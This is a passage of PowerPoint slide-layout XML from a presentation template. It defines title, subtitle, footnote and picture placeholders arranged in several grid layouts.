            </a:lvl1pPr>
            <a:lvl2pPr>
              <a:defRPr lang="en-US" sz="1600" dirty="0"/>
            </a:lvl2pPr>
            <a:lvl3pPr>
              <a:defRPr lang="en-US" sz="1600" dirty="0"/>
            </a:lvl3pPr>
            <a:lvl4pPr>
              <a:defRPr lang="en-US" sz="1600" dirty="0"/>
            </a:lvl4pPr>
            <a:lvl5pPr>
              <a:defRPr lang="en-GB" sz="16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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="25550379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ubtitle, content &amp; source/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08"/>
            <a:ext cx="11337925" cy="710639"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b"/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Add title</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Text Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{815D3A4F-C11A-480D-B249-1B3A0A517FC3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="358775" y="1213249"/>
            <a:ext cx="11337924" cy="343161"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr lang="en-GB" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="228600" lvl="0" indent="-228600">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Add subtitle</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Content Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CDFAFE8B-1D42-460B-875F-B063FE652E28}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="11" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="358775" y="1628775"/>
            <a:ext cx="11337925" cy="4232200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr lang="en-US" sz="1600" dirty="0"/>
            </a:lvl1pPr>
            <a:lvl2pPr>
              <a:defRPr lang="en-US" sz="1600" dirty="0"/>
            </a:lvl2pPr>
            <a:lvl3pPr>
              <a:defRPr lang="en-US" sz="1600" dirty="0"/>
            </a:lvl3pPr>
            <a:lvl4pPr>
              <a:defRPr lang="en-US" sz="1600" dirty="0"/>
            </a:lvl4pPr>
            <a:lvl5pPr>
              <a:defRPr lang="en-GB" sz="16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6" name="Text Placeholder 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AA1095E4-71FF-4040-9780-3C562EF7E771}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="19" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="358776" y="6024283"/>
            <a:ext cx="11337924" cy="189230"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr lang="en-US" sz="900" i="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr>
              <a:defRPr lang="en-US" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr>
              <a:defRPr lang="en-US" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr>
              <a:defRPr lang="en-US" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr>
              <a:defRPr lang="en-GB">
                <a:latin typeface="+mj-lt"/>
              </a:defRPr>
            </a:lvl5pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="228600" lvl="0" indent="-228600"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Add footnote/source</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="9619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ogo on plum">
    <p:bg>
      <p:bgPr>
        <a:solidFill>
          <a:schemeClr val="accent5"/>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C26AD0A-B2DA-4BA8-971E-89A9C370B04A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr userDrawn="1"/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4149377" y="1520825"/>
            <a:ext cx="3893247" cy="3810079"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31" name="Text Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F339E9A1-E807-4C8A-8D51-FE1369288023}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1323037" y="6129338"/>
            <a:ext cx="7166539" cy="381001"/>
          </a:xfrm>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr lang="en-US" sz="850" b="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4599279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pic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08"/>
            <a:ext cx="11337925" cy="710639"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b"/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Add title</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Picture Placeholder 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{863F8DF2-10EE-4ED2-91AB-B7E3C37627A0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="pic" sz="quarter" idx="12" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="358775" y="1449388"/>
            <a:ext cx="11337924" cy="4190999"/>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10" name="Text Placeholder 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{75C1C585-F7B3-47D7-9F59-BA03B794FAAB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="358775" y="5640387"/>
            <a:ext cx="11337924" cy="488951"/>
          </a:xfrm>
          <a:solidFill>
            <a:srgbClr val="4D4D4D"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="108000" tIns="108000" rIns="108000" bIns="108000"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" inden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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="36493375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4 pics with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08"/>
            <a:ext cx="11337925" cy="710639"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b"/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Add title</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Picture Placeholder 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{863F8DF2-10EE-4ED2-91AB-B7E3C37627A0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="pic" sz="quarter" idx="12" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="358775" y="1449388"/>
            <a:ext cx="5486400" cy="1735137"/>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10" name="Text Placeholder 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{75C1C585-F7B3-47D7-9F59-BA03B794FAAB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="358775" y="3184525"/>
            <a:ext cx="5486400"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
        <p:nvSpPr>
          <p:cNvPr id="11" name="Picture Placeholder 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{20808307-4B52-4775-B16F-1438C3DD8A81}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="pic" sz="quarter" idx="14" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="358775" y="3905250"/>
            <a:ext cx="5486400" cy="1735137"/>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12" name="Text Placeholder 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9B44C7F4-FBFC-4ABE-9663-0758653A2B1F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="15" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="358775" y="5640387"/>
            <a:ext cx="5486400"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
        <p:nvSpPr>
          <p:cNvPr id="13" name="Picture Placeholder 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AC1FF0E8-B389-485A-9664-2B27C4F12422}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="pic" sz="quarter" idx="16" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6210300" y="1449388"/>
            <a:ext cx="5486400" cy="1735137"/>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14" name="Text Placeholder 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{56107E15-62BB-43E5-A4C5-5177E6D4660F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="17" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6210300" y="3184525"/>
            <a:ext cx="5486400"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
        <p:nvSpPr>
          <p:cNvPr id="15" name="Picture Placeholder 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{80B95727-A744-4D5C-BFFA-489C9098B7A4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="pic" sz="quarter" idx="18" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6210300" y="3905250"/>
            <a:ext cx="5486400" cy="1735137"/>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16" name="Text Placeholder 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{867AB062-BC9C-4B04-BA85-D3A8B1204D2C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="19" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6210300" y="5640387"/>
            <a:ext cx="5486400"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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="10132113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6 pics with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08"/>
            <a:ext cx="11337925" cy="710639"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b"/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Add title</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Picture Placeholder 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{863F8DF2-10EE-4ED2-91AB-B7E3C37627A0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="pic" sz="quarter" idx="12" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="358777" y="1449388"/>
            <a:ext cx="3550030" cy="1735137"/>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10" name="Text Placeholder 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{75C1C585-F7B3-47D7-9F59-BA03B794FAAB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="358777" y="3184525"/>
            <a:ext cx="3550030"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
        <p:nvSpPr>
          <p:cNvPr id="11" name="Picture Placeholder 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{20808307-4B52-4775-B16F-1438C3DD8A81}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="pic" sz="quarter" idx="14" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="358777" y="3905250"/>
            <a:ext cx="3550030" cy="1735137"/>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12" name="Text Placeholder 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9B44C7F4-FBFC-4ABE-9663-0758653A2B1F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="15" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="358777" y="5640387"/>
            <a:ext cx="3550030"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
        <p:nvSpPr>
          <p:cNvPr id="55" name="Picture Placeholder 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{479FBAD6-4BFA-4431-8975-ADB4B71598D3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="pic" sz="quarter" idx="16" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4253836" y="1449388"/>
            <a:ext cx="3550030" cy="1735137"/>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56" name="Text Placeholder 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B55CAB97-B3BF-470D-9F6B-D5EDA04B22B3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="17" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4253836" y="3184525"/>
            <a:ext cx="3550030"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
        <p:nvSpPr>
          <p:cNvPr id="57" name="Picture Placeholder 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5C9A712D-E437-4A25-960D-B27B8F34B691}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="pic" sz="quarter" idx="18" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4253836" y="3905250"/>
            <a:ext cx="3550030" cy="1735137"/>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58" name="Text Placeholder 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4B9C6B14-0BAE-4417-A499-564B5A7A233F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="19" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4253836" y="5640387"/>
            <a:ext cx="3550030"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
        <p:nvSpPr>
          <p:cNvPr id="60" name="Picture Placeholder 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E3523C2A-5621-4CFB-A631-36567F0B7E02}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="pic" sz="quarter" idx="20" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8148895" y="1449388"/>
            <a:ext cx="3550030" cy="1735137"/>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61" name="Text Placeholder 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6CEBD3A7-807C-4C08-ACED-8976C990A863}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="21" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8148895" y="3184525"/>
            <a:ext cx="3550030"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
        <p:nvSpPr>
          <p:cNvPr id="62" name="Picture Placeholder 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DD460847-667B-4272-8519-83CFD44E4DCC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="pic" sz="quarter" idx="22" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8148895" y="3905250"/>
            <a:ext cx="3550030" cy="1735137"/>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63" name="Text Placeholder 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4EDDB16E-EE3B-4791-B8C5-BDC6D8EB756E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="23" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8148895" y="5640387"/>
            <a:ext cx="3550030"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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="282996908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3 pics with text &amp; dividing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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="6" name="Straight Connector 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8DFD8DC6-333F-4D12-B2B1-E0CC8E63A54F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7990456" y="1449388"/>
            <a:ext cx="0" cy="4679949"/>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B1D0B4F-4C26-470A-9E53-C4AAD8791734}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4065028" y="1449388"/>
            <a:ext cx="0" cy="4679949"/>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14" name="Picture Placeholder 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{910E507C-AAE6-4FED-AC4E-A73D986154BA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="pic" sz="quarter" idx="12" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="358774" y="1449389"/>
            <a:ext cx="3487080" cy="2167912"/>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15" name="Text Placeholder 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C635C1B9-56DB-4822-8BE1-1B71F05D39B4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="358774" y="3617300"/>
            <a:ext cx="3487080"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
        <p:nvSpPr>
          <p:cNvPr id="4" name="Text Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C294BD5C-A104-49D3-B85B-71FA3DCD71ED}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
